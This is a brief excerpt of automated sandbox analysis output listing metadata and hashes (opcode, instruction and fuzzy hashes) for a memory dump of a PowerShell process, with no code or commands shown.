                                                                                • Source File: 0000000B.00000002.1955683014.00007FF7BFFA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7BFFA0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7ff7bffa0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f9669d9bd1ae11dac2dce3a60ba452fbb1767084e6756bf69dc1aaf06e7fcfe9
                                                                                • Instruction ID: 6562a00a6c65c649999fac2ddecdfbe4e2ed9264c22875286140ad2fc73111c0
                                                                                • Opcode Fuzzy Hash: f9669d9bd1ae11dac2dce3a60ba452fbb1767084e6756bf69dc1aaf06e7fcfe9
                                                                                • Instruction Fuzzy Hash: 19C19731E0EACA4FE795EBAC88155F9BBE0FF12721B4401BED11DC7193CA29A815C361